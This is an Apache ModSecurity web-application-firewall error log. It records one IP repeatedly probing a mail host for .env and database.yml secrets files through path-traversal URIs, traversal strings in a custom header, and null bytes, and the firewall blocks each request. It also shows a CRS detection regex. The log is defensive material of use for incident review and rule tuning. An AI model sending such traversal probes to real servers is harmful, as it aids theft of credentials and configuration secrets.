[Tue May 12 05:30:20.853142 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.247:29880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKezM1tk6y7yBJLpJo51wAAAI0"]
[Tue May 12 05:30:20.860455 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/var/www/.env"] [unique_id "agKezM1tk6y7yBJLpJo52AAAAIY"]
[Tue May 12 05:30:20.860650 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/var/www/.env"] [unique_id "agKezM1tk6y7yBJLpJo52AAAAIY"]
[Tue May 12 05:30:21.428648 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKey9r1yOh9TvizezifuwAAAEY"]
[Tue May 12 05:30:21.465433 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKezdr1yOh9TvizezifwAAAAEY"]
[Tue May 12 05:30:21.465479 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKezdr1yOh9TvizezifwAAAAEY"]
[Tue May 12 05:30:21.465508 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKezdr1yOh9TvizezifwAAAAEY"]
[Tue May 12 05:30:21.465720 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKezdr1yOh9TvizezifwAAAAEY"]
[Tue May 12 05:30:21.465755 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKezdr1yOh9TvizezifwAAAAEY"]
[Tue May 12 05:30:21.466186 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKezdr1yOh9TvizezifwAAAAEY"]
[Tue May 12 05:30:22.442604 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKezAgpmE1yW0glLdguXgAAAM4"]
[Tue May 12 05:30:22.481511 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.247:29880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKezM1tk6y7yBJLpJo51wAAAI0"]
[Tue May 12 05:30:22.484476 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKezggpmE1yW0glLdguZAAAAM4"]
[Tue May 12 05:30:22.484646 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKezggpmE1yW0glLdguZAAAAM4"]
[Tue May 12 05:30:22.522955 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.247:29880] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKezs1tk6y7yBJLpJo53wAAAI0"]
[Tue May 12 05:30:22.523072 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.247:29880] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKezs1tk6y7yBJLpJo53wAAAI0"]
[Tue May 12 05:30:22.523298 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.247:29880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKezs1tk6y7yBJLpJo53wAAAI0"]
[Tue May 12 05:30:22.532458 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKezM1tk6y7yBJLpJo52AAAAIY"]
[Tue May 12 05:30:22.571704 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/var/www/html/.env"] [unique_id "agKezs1tk6y7yBJLpJo54AAAAIY"]
[Tue May 12 05:30:22.571905 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/var/www/html/.env"] [unique_id "agKezs1tk6y7yBJLpJo54AAAAIY"]
[Tue May 12 05:30:22.710855 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKezdr1yOh9TvizezifwAAAAEY"]
[Tue May 12 05:30:22.747551 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKeztr1yOh9TvizezifxQAAAEY"]
[Tue May 12 05:30:22.747606 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKeztr1yOh9TvizezifxQAAAEY"]
[Tue May 12 05:30:22.747635 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKeztr1yOh9TvizezifxQAAAEY"]
[Tue May 12 05:30:22.748266 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKeztr1yOh9TvizezifxQAAAEY"]
[Tue May 12 05:30:23.765007 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKezggpmE1yW0glLdguZAAAAM4"]
[Tue May 12 05:30:23.799529 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.247:29880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKezs1tk6y7yBJLpJo53wAAAI0"]
[Tue May 12 05:30:23.807540 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/api/.env"] [unique_id "agKezwgpmE1yW0glLdguaQAAAM4"]
[Tue May 12 05:30:23.807825 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/.env"] [unique_id "agKezwgpmE1yW0glLdguaQAAAM4"]
[Tue May 12 05:30:23.838835 2026] [core:error] [pid 1820198:tid 1820213] [client 45.148.10.247:29880] AH10244: invalid URI path (/assets../../../.env)
[Tue May 12 05:30:23.858176 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKezs1tk6y7yBJLpJo54AAAAIY"]
[Tue May 12 05:30:24.076431 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/public/.env"] [unique_id "agKe0M1tk6y7yBJLpJo55gAAAIY"]
[Tue May 12 05:30:24.076624 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/public/.env"] [unique_id "agKe0M1tk6y7yBJLpJo55gAAAIY"]
[Tue May 12 05:30:24.236279 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeztr1yOh9TvizezifxQAAAEY"]
[Tue May 12 05:30:24.272857 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0Nr1yOh9TvizezifyQAAAEY"]
[Tue May 12 05:30:24.272934 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0Nr1yOh9TvizezifyQAAAEY"]
[Tue May 12 05:30:24.272965 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0Nr1yOh9TvizezifyQAAAEY"]
[Tue May 12 05:30:24.273171 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0Nr1yOh9TvizezifyQAAAEY"]
[Tue May 12 05:30:24.273218 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0Nr1yOh9TvizezifyQAAAEY"]
